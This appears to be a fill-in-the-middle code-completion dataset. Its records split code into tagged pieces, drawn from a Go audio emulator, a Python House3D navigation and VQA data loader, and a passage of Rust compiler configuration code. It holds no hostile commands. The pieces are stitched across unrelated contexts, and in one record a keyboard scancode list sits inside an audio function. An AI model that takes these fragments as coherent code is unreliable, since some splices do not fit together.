func (snd *HwSound) RunOneFrame(buf []int16) {
for i := 0; i < len(buf); i += 2 {
l, r := snd.step()
// Extend to 16-bit range
l = l<<6 | l>>4
r = r<<6 | r>>4
buf[i] = int16(l - 0x8000)
buf[i+1] = int16(r - 0x8000)
}
}
func mulvol64(s int64, vol int64) int64 {
if vol == 127 {
return s
}
return (s * vol) >> 7
}
// Emulate one tick of audio, producing a couple of (unsigned) 16-bit audio samples
func (snd *HwSound) step() (uint16, uint16) {
var lmix, rmix int64
var chbuf [4]int64
// Master enable
if snd.SndGCnt.Value&(1<<15) == 0 {
return uint16(snd.SndBias.Value), uint16(snd.SndBias.Value)
}
scans := []int{
hw.SCANCODE_0,
hw.SCANCODE_1,
hw.SCANCODE_2,
|
hw.SCANCODE_3,
hw.SCANCODE_4,
hw.SCANCODE_5,
hw.SCANCODE_6,
|
random_line_split
|
|
sound.go
|
8]int16{-1, -1, -1, -1, 2, 4, 6, 8}
adpcmTable = [89]uint16{
0x0007, 0x0008, 0x0009, 0x000A, 0x000B, 0x000C, 0x000D, 0x000E, 0x0010, 0x0011, 0x0013, 0x0015,
0x0017, 0x0019, 0x001C, 0x001F, 0x0022, 0x0025, 0x0029, 0x002D, 0x0032, 0x0037, 0x003C, 0x0042,
0x0049, 0x0050, 0x0058, 0x0061, 0x006B, 0x0076, 0x0082, 0x008F, 0x009D, 0x00AD, 0x00BE, 0x00D1,
0x00E6, 0x00FD, 0x0117, 0x0133, 0x0151, 0x0173, 0x0198, 0x01C1, 0x01EE, 0x0220, 0x0256, 0x0292,
0x02D4, 0x031C, 0x036C, 0x03C3, 0x0424, 0x048E, 0x0502, 0x0583, 0x0610, 0x06AB, 0x0756, 0x0812,
0x08E0, 0x09C3, 0x0ABD, 0x0BD0, 0x0CFF, 0x0E4C, 0x0FBA, 0x114C, 0x1307, 0x14EE, 0x1706, 0x1954,
0x1BDC, 0x1EA5, 0x21B6, 0x2515, 0x28CA, 0x2CDF, 0x315B, 0x364B, 0x3BB9, 0x41B2, 0x4844, 0x4F7E,
0x5771, 0x602F, 0x69CE, 0x7462, 0x7FFF,
}
psgTable = [8][16]uint8{
{0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0xff, 0x7f}, // _______-
{0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0xff, 0x7f, 0xff, 0x7f}, // ______--
{0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f}, // _____---
{0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f}, // ____----
{0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f}, // ___-----
{0x01, 0x80, 0x01, 0x80, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f}, // __------
{0x01, 0x80, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f, 0xff, 0x7f}, // _-------
{0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80, 0x01, 0x80}, // ________
}
)
func (snd *HwSound) adpcmDecompress(buf []byte) []byte {
// ioutil.WriteFile("sound.adpcm", buf, 0666)
head := binary.LittleEndian.Uint32(buf[:4])
buf = buf[4:]
pcm := int32(int16(head & 0xFFFF))
index := int16(head>>16) & 0x7F
res := make([]byte, 0, len(buf)*4)
dec := func(sample uint8) {
diff := adpcmTable[index] / 8
diff += (adpcmTable[index] / 4) * uint16((sample>>0)&1)
diff += (adpcmTable[index] / 2) * uint16((sample>>1)&1)
diff += (adpcmTable[index] / 1) * uint16((sample>>2)&1)
if sample&8 == 0 {
pcm += int32(diff)
if pcm > 0x7FFF {
pcm = 0x7FFF
}
} else {
pcm -= int32(diff)
if pcm < -0x7FFF {
pcm = -0x7FFF
}
}
index += adpcmIndexTable[sample&7]
if index < 0 {
index = 0
} else if index > 88 {
index = 88
}
}
for i := range buf {
dec(buf[i] & 0xF)
res = append(res, uint8(pcm&0xFF))
res = append(res, uint8((pcm>>8)&0xFF))
dec(buf[i] >> 4)
res = append(res, uint8(pcm&0xFF))
res = append(res, uint8((pcm>>8)&0xFF))
}
return res
}
func (snd *HwSound) RunOneFrame(buf []int16) {
|
for i := 0; i < len(buf); i += 2 {
l, r := snd.step()
// Extend to 16-bit range
l = l<<6 | l>>4
r = r<<6 | r>>4
buf[i] = int16(l - 0x8000)
buf[i+1] = int16(r - 0x8000)
}
}
|
identifier_body
|
|
nav_loc_vqa_rl_loader.py
|
start, len(self.all_houses)))
# Load envs
start = time.time()
self.env_loaded = {}
for i in range(len(self.all_houses)):
print('[%02d/%d][split:%s][gpu:%d][house:%s]' %
(i + 1, len(self.all_houses), self.split, self.gpu_id, self.all_houses[i].house['id']))
env = Environment(self.api_threads[i], self.all_houses[i], self.cfg)
self.env_loaded[self.all_houses[i].house['id']] = \
House3DUtils(env, target_obj_conn_map_dir=self.target_obj_conn_map_dir)
print('[%.02f] Loaded %d house3d envs' % (time.time() - start, len(self.env_loaded)))
for i in range(len(self.all_houses)):
self.visited_envs.add(self.all_houses[i].house['id'])
# Mark available data indices
self.available_idx = [i for i, v in enumerate(self.env_list) if v in self.env_loaded]
print('Available inds: %d' % len(self.available_idx))
def _load_env(self, house):
# For testing (ipynb) only, we wanna load just one house.
start = time.time()
self.all_houses = [local_create_house(house, self.cfg, self.map_resolution)]
env = Environment(self.api_threads[0], self.all_houses[0], self.cfg)
self.env_loaded[house] = House3DUtils(env, target_obj_conn_map_dir=self.target_obj_conn_map_dir)
print('[%.02f] Loaded 1 house3d envs' % (time.time() - start))
def _check_if_all_envs_loaded(self):
print('[CHECK][Visited:%d envs][Total:%d envs]' % (len(self.visited_envs), len(self.env_set)))
return True if len(self.visited_envs) == len(self.env_set) else False
def _check_if_all_targets_loaded(self):
print('[CHECK][Visited:%d targets][Total:%d targets]' % (len(self.img_data_cache), len(self.env_list)))
if len(self.img_data_cache) == len(self.env_list):
self.available_idx = [i for i, v in enumerate(self.env_list)]
return True
else:
return False
def set_camera(self, e, pos, robot_height=1.0):
assert len(pos) == 4
e.env.cam.pos.x = pos[0]
e.env.cam.pos.y = robot_height
e.env.cam.pos.z = pos[2]
e.env.cam.yaw = pos[3]
e.env.cam.updateDirection()
def render(self, e):
return e.env.render()
def get_frames(self, e, pos_queue, preprocess=True):
# return imgs (n, 3, 224, 224) along pos_queue
if not isinstance(pos_queue, list):
pos_queue = [pos_queue]
res = []
for i in range(len(pos_queue)):
self.set_camera(e, pos_queue[i])
img = np.array(self.render(e), copy=False, dtype=np.uint8)
if preprocess:
img = img.astype(np.float32) / 255.
img = img.transpose(2, 0, 1) # (3, 224, 224)
res.append(img)
return np.array(res)
def __getitem__(self, index):
"""
- idx
- qid, house
- question, answer
- qe, ae
- type
- attr
- path_ix
- nav_ids
- nav_types
- nav_ego_feats #navs of (l, 3200) float32
- nav_action_inputs #navs of (l, ) int64
- nav_action_outputs #navs of (l, ) int64
- nav_ego_imgs #navs of (l, 224, 224, 3) uint8 if necessary
private variables:
- episode_house
- nav_pos_queues #navs of l [x, y, z, yaw]
- path_len
"""
idx = self.available_idx[index]
qn = self.questions[idx]
qid = qn['id']
house = qn['house']
attr, room_attr = self.question_to_attribute(qn)
# encode question and answer
qe = self.encoded_questions[qn['h5_id']]
ae = self.encoded_questions[qn['h5_id']]
# choose path_ix
path_ix = random.choice(range(qn['num_paths'])) if self.split == 'train' else 0
path_feats_h5 = h5py.File(osp.join(self.path_feats_dir, qn['path_name']+'.h5'), 'r')
raw_ego_feats = path_feats_h5['ego_rgb%s' % path_ix][...].reshape(-1, 3200) # (L, 32, 10, 10)
raw_path_len = raw_ego_feats.shape[0]
raw_actions = qn['path_actions'][path_ix] # (L, )
raw_pos_queue = qn['path_positions'][path_ix] # list of L positions
if self.requires_imgs:
path_images_h5 = h5py.File(osp.join(self.path_images_dir, qn['path_name']+'.h5'), 'r')
raw_ego_imgs = path_images_h5['ego_rgb%s' % path_ix] # (L, 224, 224, 3)
nav_ego_imgs = []
# nav_phrases, nav_phrase_embs
nav_pgs = [pg for pg in qn['program'] if 'nav' in pg['function']]
nav_ids = [pg['id'][0] for pg in qn['program'] if 'nav' in pg['function']]
nav_types = [pg['function'][4:] for pg in qn['program'] if 'nav' in pg['function']]
nav_phrases = [pg['value_inputs'][0] for pg in qn['program'] if 'nav' in pg['function']]
nav_phrase_embs = []
for phrase in nav_phrases:
nav_phrase_embs.append(np.array([self.wtov[wd] for wd in phrase.split()]).mean(0).astype(np.float32)) # (300, )
nav_phrase_embs = np.array(nav_phrase_embs) # (#targets, 300)
# For each segment path: feats + actions + pos_queue
raw_key_ixs = qn['key_ixs_set'][path_ix]
nav_ego_feats = []
nav_action_inputs = []
nav_action_outputs = []
nav_pos_queues = []
for i, key_ix in enumerate(raw_key_ixs):
start_ix = 0 if i == 0 else raw_key_ixs[i-1] # we use last key_ix moment as start (spawn location)
end_ix = raw_key_ixs[i]+1
ego_feats = raw_ego_feats[start_ix:end_ix]
action_inputs = np.array([4] + raw_actions[start_ix:end_ix][:-1], dtype=np.int64)
action_outputs = np.array(raw_actions[start_ix:end_ix-1] + [3], dtype=np.int64)
pos_queue = raw_pos_queue[start_ix:end_ix]
assert ego_feats.shape[0] == len(pos_queue) == action_inputs.shape[0]
# add to list
nav_ego_feats.append(ego_feats)
nav_action_inputs.append(action_inputs)
nav_action_outputs.append(action_outputs)
nav_pos_queues.append(pos_queue)
if self.requires_imgs:
nav_ego_imgs.append(raw_ego_imgs[start_ix:end_ix])
# cache
if self.to_cache and index not in self.img_data_cache:
self.img_data_cache[index] = True # TODO: replace with ego_feats
# private variable
self.episode_house = self.env_loaded[house]
self.nav_pos_queues = nav_pos_queues
self.path_len = raw_path_len
# return
data = {}
data['idx'] = idx
data['qid'] = qid
data['house'] = qn['house']
data['question'] = qn['question']
data['answer'] = qn['answer']
data['type'] = qn['type']
data['attr'] = attr
data['qe'] = qe
data['ae'] = ae
data['path_name'] = qn['path_name']
data['path_ix'] = path_ix
data['nav_ids'] = nav_ids
data['nav_types'] = nav_types
data['nav_phrases'] = nav_phrases
data['nav_phrase_embs'] = nav_phrase_embs
data['nav_ego_feats'] = nav_ego_feats
data['nav_action_inputs'] = nav_action_inputs
data['nav_action_outputs'] = nav_action_outputs
if self.requires_imgs:
data['nav_ego_imgs'] = nav_ego_imgs
return data
def
|
spawn_agent
|
identifier_name
|
|
nav_loc_vqa_rl_loader.py
|
gpu_id,
max_threads_per_gpu,
cfg,
to_cache,
target_obj_conn_map_dir,
map_resolution,
pretrained_cnn_path,
requires_imgs=False,
question_types=['all'],
ratio=None,
height=224,
width=224,
num_questions=-1):
print('Loading data.json:', data_json)
self.infos = json.load(open(data_json))
self.wtoi = self.infos['wtoi'] # question vocab
self.atoi = self.infos['atoi'] # answer vocab
self.ctoi = self.infos['ctoi'] # color vocab
self.wtov = self.infos['wtov'] # word2vec
self.itow = {i: w for w, i in self.wtoi.items()}
self.itoa = {i: a for a, i in self.atoi.items()}
self.itoc = {i: c for c, i in self.ctoi.items()}
print('%s question vocab, %s answer vocab, %s color vocab, %s word2vec loaded.' % \
(len(self.wtoi), len(self.atoi), len(self.ctoi), len(self.wtov)))
# questions
if question_types == ['all']:
self.questions = [qn for qn in self.infos['questions'] if qn['split'] == split]
else:
self.questions = [qn for qn in self.infos['questions'] if qn['split'] == split and qn['type'] in question_types]
if num_questions != -1:
self.questions = self.questions[:num_questions]
self.Questions = {qn['id']: qn for qn in self.questions}
self.ids = [qn['id'] for qn in self.questions]
print('%s questions loaded for type%s under split[%s].' % (len(self.questions), question_types, split))
# hid_tid_to_best_iou
self.hid_tid_to_best_iou = self.infos['hid_tid_to_best_iou'] # hid_tid --> best_iou
# load data.h5
encoded = h5py.File(data_h5, 'r')
self.encoded_questions = encoded['encoded_questions']
self.encoded_answers = encoded['encoded_answers']
assert self.encoded_questions.shape[0] == self.encoded_answers.shape[0]
print('max_length of encoded_questions is', self.encoded_questions.shape[1])
print('[%s] data prepared, where there are %s questions.' % (split, len(self.questions)))
# actions
self.actions = ['forward', 'left', 'right', 'dummy']
self.act_to_ix = {'forward': 0, 'left': 1, 'right': 2, 'stop': 3, 'dummy': 4}
self.ix_to_act = {i: a for a, i in self.act_to_ix.items()}
# more info
self.split = split
self.path_feats_dir = path_feats_dir
self.path_images_dir = path_images_dir
self.requires_imgs = requires_imgs
self.pre_size = 5 # hard code it
self.gpu_id = gpu_id
self.cfg = cfg
self.max_threads_per_gpu = max_threads_per_gpu
self.target_obj_conn_map_dir = target_obj_conn_map_dir
self.map_resolution = map_resolution
self.to_cache = to_cache
self.height = height or 224
self.width = width or 224
self.episode_pos_queue = None
self.episode_house = None
self.target_room = None
self.target_obj = None
self.img_data_cache = {} # qid --> feats
self.available_idx = []
self.visited_envs = set()
self.api_threads = []
# set up cnn
cnn_kwargs = {'num_classes': 191, 'pretrained': True, 'checkpoint_path': pretrained_cnn_path}
self.cnn = MultitaskCNN(**cnn_kwargs).cuda()
self.cnn.eval()
print('cnn set up.')
# construct mapping
self.envs = list(set([qn['house'] for qn in self.questions])) # all house_ids
self.env_idx = [self.envs.index(qn['house']) for qn in self.questions] # house index for each question
self.env_list = [self.envs[x] for x in self.env_idx] # list of house_ids for each question
self.env_set = list(set(self.env_list))
self.env_set.sort() # ordered house_ids
if ratio:
assert isinstance(ratio, list), ratio
self.env_set = self.env_set[int(ratio[0]*len(self.env_set)):int(ratio[1]*len(self.env_set))]
print('Total envs: %d' % len(self.envs))
print('Envs in [%s]: %d, we use %d.' % (self.split, len(list(set(self.env_idx))), len(self.env_set)))
# load environments
self._load_envs(start_idx=0, in_order=True)
def _pick_envs_to_load(self, split, max_envs, start_idx, in_order):
"""
pick houses from self.env_set
"""
if split in ['val', 'test'] or in_order:
pruned_env_set = self.env_set[start_idx:start_idx+max_envs] # could be void if start_idx arrives end
else:
if max_envs < len(self.env_set):
env_inds = np.random.choice(len(self.env_set), max_envs, replace=False)
else:
env_inds = np.random.choice(len(self.env_set), max_envs, replace=True)
pruned_env_set = [self.env_set[x] for x in env_inds]
return pruned_env_set
def _load_envs(self, start_idx=-1, in_order=False):
if start_idx == -1: # next env
start_idx = self.env_set.index(self.pruned_env_set[-1]) + 1
# pick envs
self.pruned_env_set = self._pick_envs_to_load(self.split, self.max_threads_per_gpu,
start_idx, in_order)
if len(self.pruned_env_set) == 0:
return
# Load api threads
start = time.time()
if len(self.api_threads) == 0:
for i in range(self.max_threads_per_gpu):
self.api_threads.append(objrender.RenderAPIThread(w=self.width, h=self.height, device=self.gpu_id))
print('[%.2f] Loaded %d api threads' % (time.time()-start, len(self.api_threads)))
# Load houses
start = time.time()
from multiprocessing import Pool
_args = ([h, self.cfg, self.map_resolution] for h in self.pruned_env_set)
with Pool(len(self.pruned_env_set)) as pool:
self.all_houses = pool.starmap(local_create_house, _args)
print('[%.02f] Loaded %d houses' % (time.time() - start, len(self.all_houses)))
# Load envs
start = time.time()
self.env_loaded = {}
for i in range(len(self.all_houses)):
print('[%02d/%d][split:%s][gpu:%d][house:%s]' %
(i + 1, len(self.all_houses), self.split, self.gpu_id, self.all_houses[i].house['id']))
env = Environment(self.api_threads[i], self.all_houses[i], self.cfg)
self.env_loaded[self.all_houses[i].house['id']] = \
House3DUtils(env, target_obj_conn_map_dir=self.target_obj_conn_map_dir)
print('[%.02f] Loaded %d house3d envs' % (time.time() - start, len(self.env_loaded)))
for i in range(len(self.all_houses)):
self.visited_envs.add(self.all_houses[i].house['id'])
# Mark available data indices
self.available_idx = [i for i, v in enumerate(self.env_list) if v in self.env_loaded]
print('Available inds: %d' % len(self.available_idx))
def _load_env(self, house):
# For testing (ipynb) only, we wanna load just one house.
start = time.time()
self.all_houses = [local_create_house(house, self.cfg, self.map_resolution)]
env = Environment(self.api_threads[0], self.all_houses[0], self.cfg)
self.env_loaded[house] = House3DUtils(env, target_obj_conn_map_dir=self.target_obj_conn_map_dir)
print('[%.02f] Loaded 1 house3d envs' % (time.time() - start))
def _check_if_all_envs_loaded(self):
print('[CHECK][Visited:%d envs][Total:%d envs]' % (len(self.visited_envs), len(self.env_set)))
return True if len(self.visited_envs) == len(self.env_set) else False
def _check_if_all_targets_loaded(self):
print('[CHECK][Visited:%d targets][
|
def __init__(self, data_json, data_h5,
path_feats_dir,
path_images_dir,
split,
|
random_line_split
|
|
nav_loc_vqa_rl_loader.py
|
%d houses' % (time.time() - start, len(self.all_houses)))
# Load envs
start = time.time()
self.env_loaded = {}
for i in range(len(self.all_houses)):
print('[%02d/%d][split:%s][gpu:%d][house:%s]' %
(i + 1, len(self.all_houses), self.split, self.gpu_id, self.all_houses[i].house['id']))
env = Environment(self.api_threads[i], self.all_houses[i], self.cfg)
self.env_loaded[self.all_houses[i].house['id']] = \
House3DUtils(env, target_obj_conn_map_dir=self.target_obj_conn_map_dir)
print('[%.02f] Loaded %d house3d envs' % (time.time() - start, len(self.env_loaded)))
for i in range(len(self.all_houses)):
self.visited_envs.add(self.all_houses[i].house['id'])
# Mark available data indices
self.available_idx = [i for i, v in enumerate(self.env_list) if v in self.env_loaded]
print('Available inds: %d' % len(self.available_idx))
def _load_env(self, house):
# For testing (ipynb) only, we wanna load just one house.
start = time.time()
self.all_houses = [local_create_house(house, self.cfg, self.map_resolution)]
env = Environment(self.api_threads[0], self.all_houses[0], self.cfg)
self.env_loaded[house] = House3DUtils(env, target_obj_conn_map_dir=self.target_obj_conn_map_dir)
print('[%.02f] Loaded 1 house3d envs' % (time.time() - start))
def _check_if_all_envs_loaded(self):
print('[CHECK][Visited:%d envs][Total:%d envs]' % (len(self.visited_envs), len(self.env_set)))
return True if len(self.visited_envs) == len(self.env_set) else False
def _check_if_all_targets_loaded(self):
print('[CHECK][Visited:%d targets][Total:%d targets]' % (len(self.img_data_cache), len(self.env_list)))
if len(self.img_data_cache) == len(self.env_list):
self.available_idx = [i for i, v in enumerate(self.env_list)]
return True
else:
return False
def set_camera(self, e, pos, robot_height=1.0):
assert len(pos) == 4
e.env.cam.pos.x = pos[0]
e.env.cam.pos.y = robot_height
e.env.cam.pos.z = pos[2]
e.env.cam.yaw = pos[3]
e.env.cam.updateDirection()
def render(self, e):
return e.env.render()
def get_frames(self, e, pos_queue, preprocess=True):
# return imgs (n, 3, 224, 224) along pos_queue
if not isinstance(pos_queue, list):
pos_queue = [pos_queue]
res = []
for i in range(len(pos_queue)):
self.set_camera(e, pos_queue[i])
img = np.array(self.render(e), copy=False, dtype=np.uint8)
if preprocess:
img = img.astype(np.float32) / 255.
img = img.transpose(2, 0, 1) # (3, 224, 224)
res.append(img)
return np.array(res)
def __getitem__(self, index):
"""
- idx
- qid, house
- question, answer
- qe, ae
- type
- attr
- path_ix
- nav_ids
- nav_types
- nav_ego_feats #navs of (l, 3200) float32
- nav_action_inputs #navs of (l, ) int64
- nav_action_outputs #navs of (l, ) int64
- nav_ego_imgs #navs of (l, 224, 224, 3) uint8 if necessary
private variables:
- episode_house
- nav_pos_queues #navs of l [x, y, z, yaw]
- path_len
"""
idx = self.available_idx[index]
qn = self.questions[idx]
qid = qn['id']
house = qn['house']
attr, room_attr = self.question_to_attribute(qn)
# encode question and answer
qe = self.encoded_questions[qn['h5_id']]
ae = self.encoded_questions[qn['h5_id']]
# choose path_ix
path_ix = random.choice(range(qn['num_paths'])) if self.split == 'train' else 0
path_feats_h5 = h5py.File(osp.join(self.path_feats_dir, qn['path_name']+'.h5'), 'r')
raw_ego_feats = path_feats_h5['ego_rgb%s' % path_ix][...].reshape(-1, 3200) # (L, 32, 10, 10)
raw_path_len = raw_ego_feats.shape[0]
raw_actions = qn['path_actions'][path_ix] # (L, )
raw_pos_queue = qn['path_positions'][path_ix] # list of L positions
if self.requires_imgs:
path_images_h5 = h5py.File(osp.join(self.path_images_dir, qn['path_name']+'.h5'), 'r')
raw_ego_imgs = path_images_h5['ego_rgb%s' % path_ix] # (L, 224, 224, 3)
nav_ego_imgs = []
# nav_phrases, nav_phrase_embs
nav_pgs = [pg for pg in qn['program'] if 'nav' in pg['function']]
nav_ids = [pg['id'][0] for pg in qn['program'] if 'nav' in pg['function']]
nav_types = [pg['function'][4:] for pg in qn['program'] if 'nav' in pg['function']]
nav_phrases = [pg['value_inputs'][0] for pg in qn['program'] if 'nav' in pg['function']]
nav_phrase_embs = []
for phrase in nav_phrases:
nav_phrase_embs.append(np.array([self.wtov[wd] for wd in phrase.split()]).mean(0).astype(np.float32)) # (300, )
nav_phrase_embs = np.array(nav_phrase_embs) # (#targets, 300)
# For each segment path: feats + actions + pos_queue
raw_key_ixs = qn['key_ixs_set'][path_ix]
nav_ego_feats = []
nav_action_inputs = []
nav_action_outputs = []
nav_pos_queues = []
for i, key_ix in enumerate(raw_key_ixs):
start_ix = 0 if i == 0 else raw_key_ixs[i-1] # we use last key_ix moment as start (spawn location)
end_ix = raw_key_ixs[i]+1
ego_feats = raw_ego_feats[start_ix:end_ix]
action_inputs = np.array([4] + raw_actions[start_ix:end_ix][:-1], dtype=np.int64)
action_outputs = np.array(raw_actions[start_ix:end_ix-1] + [3], dtype=np.int64)
pos_queue = raw_pos_queue[start_ix:end_ix]
assert ego_feats.shape[0] == len(pos_queue) == action_inputs.shape[0]
# add to list
nav_ego_feats.append(ego_feats)
nav_action_inputs.append(action_inputs)
nav_action_outputs.append(action_outputs)
nav_pos_queues.append(pos_queue)
if self.requires_imgs:
nav_ego_imgs.append(raw_ego_imgs[start_ix:end_ix])
# cache
if self.to_cache and index not in self.img_data_cache:
self.img_data_cache[index] = True # TODO: replace with ego_feats
# private variable
self.episode_house = self.env_loaded[house]
self.nav_pos_queues = nav_pos_queues
self.path_len = raw_path_len
# return
data = {}
data['idx'] = idx
data['qid'] = qid
data['house'] = qn['house']
data['question'] = qn['question']
data['answer'] = qn['answer']
data['type'] = qn['type']
data['attr'] = attr
data['qe'] = qe
data['ae'] = ae
data['path_name'] = qn['path_name']
data['path_ix'] = path_ix
data['nav_ids'] = nav_ids
data['nav_types'] = nav_types
data['nav_phrases'] = nav_phrases
data['nav_phrase_embs'] = nav_phrase_embs
data['nav_ego_feats'] = nav_ego_feats
data['nav_action_inputs'] = nav_action_inputs
data['nav_action_outputs'] = nav_action_outputs
if self.requires_imgs:
|
data['nav_ego_imgs'] = nav_ego_imgs
|
conditional_block
|
|
nav_loc_vqa_rl_loader.py
|
print('%s questions loaded for type%s under split[%s].' % (len(self.questions), question_types, split))
# hid_tid_to_best_iou
self.hid_tid_to_best_iou = self.infos['hid_tid_to_best_iou'] # hid_tid --> best_iou
# load data.h5
encoded = h5py.File(data_h5, 'r')
self.encoded_questions = encoded['encoded_questions']
self.encoded_answers = encoded['encoded_answers']
assert self.encoded_questions.shape[0] == self.encoded_answers.shape[0]
print('max_length of encoded_questions is', self.encoded_questions.shape[1])
print('[%s] data prepared, where there are %s questions.' % (split, len(self.questions)))
# actions
self.actions = ['forward', 'left', 'right', 'dummy']
self.act_to_ix = {'forward': 0, 'left': 1, 'right': 2, 'stop': 3, 'dummy': 4}
self.ix_to_act = {i: a for a, i in self.act_to_ix.items()}
# more info
self.split = split
self.path_feats_dir = path_feats_dir
self.path_images_dir = path_images_dir
self.requires_imgs = requires_imgs
self.pre_size = 5 # hard code it
self.gpu_id = gpu_id
self.cfg = cfg
self.max_threads_per_gpu = max_threads_per_gpu
self.target_obj_conn_map_dir = target_obj_conn_map_dir
self.map_resolution = map_resolution
self.to_cache = to_cache
self.height = height or 224
self.width = width or 224
self.episode_pos_queue = None
self.episode_house = None
self.target_room = None
self.target_obj = None
self.img_data_cache = {} # qid --> feats
self.available_idx = []
self.visited_envs = set()
self.api_threads = []
# set up cnn
cnn_kwargs = {'num_classes': 191, 'pretrained': True, 'checkpoint_path': pretrained_cnn_path}
self.cnn = MultitaskCNN(**cnn_kwargs).cuda()
self.cnn.eval()
print('cnn set up.')
# construct mapping
self.envs = list(set([qn['house'] for qn in self.questions])) # all house_ids
self.env_idx = [self.envs.index(qn['house']) for qn in self.questions] # house index for each question
self.env_list = [self.envs[x] for x in self.env_idx] # list of house_ids for each question
self.env_set = list(set(self.env_list))
self.env_set.sort() # ordered house_ids
if ratio:
assert isinstance(ratio, list), ratio
self.env_set = self.env_set[int(ratio[0]*len(self.env_set)):int(ratio[1]*len(self.env_set))]
print('Total envs: %d' % len(self.envs))
print('Envs in [%s]: %d, we use %d.' % (self.split, len(list(set(self.env_idx))), len(self.env_set)))
# load environments
self._load_envs(start_idx=0, in_order=True)
def _pick_envs_to_load(self, split, max_envs, start_idx, in_order):
"""
pick houses from self.env_set
"""
if split in ['val', 'test'] or in_order:
pruned_env_set = self.env_set[start_idx:start_idx+max_envs] # could be void if start_idx arrives end
else:
if max_envs < len(self.env_set):
env_inds = np.random.choice(len(self.env_set), max_envs, replace=False)
else:
env_inds = np.random.choice(len(self.env_set), max_envs, replace=True)
pruned_env_set = [self.env_set[x] for x in env_inds]
return pruned_env_set
def _load_envs(self, start_idx=-1, in_order=False):
if start_idx == -1: # next env
start_idx = self.env_set.index(self.pruned_env_set[-1]) + 1
# pick envs
self.pruned_env_set = self._pick_envs_to_load(self.split, self.max_threads_per_gpu,
start_idx, in_order)
if len(self.pruned_env_set) == 0:
return
# Load api threads
start = time.time()
if len(self.api_threads) == 0:
for i in range(self.max_threads_per_gpu):
self.api_threads.append(objrender.RenderAPIThread(w=self.width, h=self.height, device=self.gpu_id))
print('[%.2f] Loaded %d api threads' % (time.time()-start, len(self.api_threads)))
# Load houses
start = time.time()
from multiprocessing import Pool
_args = ([h, self.cfg, self.map_resolution] for h in self.pruned_env_set)
with Pool(len(self.pruned_env_set)) as pool:
self.all_houses = pool.starmap(local_create_house, _args)
print('[%.02f] Loaded %d houses' % (time.time() - start, len(self.all_houses)))
# Load envs
start = time.time()
self.env_loaded = {}
for i in range(len(self.all_houses)):
print('[%02d/%d][split:%s][gpu:%d][house:%s]' %
(i + 1, len(self.all_houses), self.split, self.gpu_id, self.all_houses[i].house['id']))
env = Environment(self.api_threads[i], self.all_houses[i], self.cfg)
self.env_loaded[self.all_houses[i].house['id']] = \
House3DUtils(env, target_obj_conn_map_dir=self.target_obj_conn_map_dir)
print('[%.02f] Loaded %d house3d envs' % (time.time() - start, len(self.env_loaded)))
for i in range(len(self.all_houses)):
self.visited_envs.add(self.all_houses[i].house['id'])
# Mark available data indices
self.available_idx = [i for i, v in enumerate(self.env_list) if v in self.env_loaded]
print('Available inds: %d' % len(self.available_idx))
def _load_env(self, house):
# For testing (ipynb) only, we wanna load just one house.
start = time.time()
self.all_houses = [local_create_house(house, self.cfg, self.map_resolution)]
env = Environment(self.api_threads[0], self.all_houses[0], self.cfg)
self.env_loaded[house] = House3DUtils(env, target_obj_conn_map_dir=self.target_obj_conn_map_dir)
print('[%.02f] Loaded 1 house3d envs' % (time.time() - start))
def _check_if_all_envs_loaded(self):
|
def _check_if_all_targets_loaded(self):
print('[CHECK][Visited:%d targets][Total:%d targets]' % (len(self.img_data_cache), len(self.env_list)))
if len(self.img_data_cache) == len(self.env_list):
self.available_idx = [i for i, v in enumerate(self.env_list)]
return True
else:
return False
def set_camera(self, e, pos, robot_height=1.0):
assert len(pos) == 4
e.env.cam.pos.x = pos[0]
e.env.cam.pos.y = robot_height
e.env.cam.pos.z = pos[2]
e.env.cam.yaw = pos[3]
e.env.cam.updateDirection()
def render(self, e):
return e.env.render()
def get_frames(self, e, pos_queue, preprocess=True):
# return imgs (n, 3, 224, 224) along pos_queue
if not isinstance(pos_queue, list):
pos_queue = [pos_queue]
res = []
for i in range(len(pos_queue)):
self.set_camera(e, pos_queue[i])
img = np.array(self.render(e), copy=False, dtype=np.uint8)
if preprocess:
img = img.astype(np.float32) / 255.
img = img.transpose(2, 0, 1) # (3, 224, 224)
res.append(img)
return np.array(res)
def __getitem__(self, index):
"""
- idx
- qid, house
- question, answer
- qe, ae
- type
- attr
- path_ix
- nav_ids
- nav_types
- nav_ego_feats #navs of (l, 3200) float32
- nav_action_inputs #navs of (l, ) int64
- nav_action_outputs #navs of (l, ) int
|
print('[CHECK][Visited:%d envs][Total:%d envs]' % (len(self.visited_envs), len(self.env_set)))
return True if len(self.visited_envs) == len(self.env_set) else False
|
identifier_body
|
config.rs
|
ared_doc: false,
span,
})
} else {
None
}
}
// Determine if a node with the given attributes should be included in this configuration.
pub fn in_cfg(&mut self, attrs: &[ast::Attribute]) -> bool {
attrs.iter().all(|attr| {
// When not compiling with --test we should not compile the #[test] functions
if !self.should_test && is_test_or_bench(attr) {
return false;
}
let mis = if !is_cfg(attr) {
return true;
} else if let Some(mis) = attr.meta_item_list() {
mis
} else {
return true;
};
if mis.len() != 1 {
self.sess.span_diagnostic.span_err(attr.span, "expected 1 cfg-pattern");
return true;
}
if !mis[0].is_meta_item() {
self.sess.span_diagnostic.span_err(mis[0].span, "unexpected literal");
return true;
}
attr::cfg_matches(mis[0].meta_item().unwrap(), self.sess, self.features)
})
}
// Visit attributes on expression and statements (but not attributes on items in blocks).
fn visit_expr_attrs(&mut self, attrs: &[ast::Attribute]) {
// flag the offending attributes
for attr in attrs.iter() {
self.maybe_emit_expr_attr_err(attr);
}
}
/// If attributes are not allowed on expressions, emit an error for `attr`
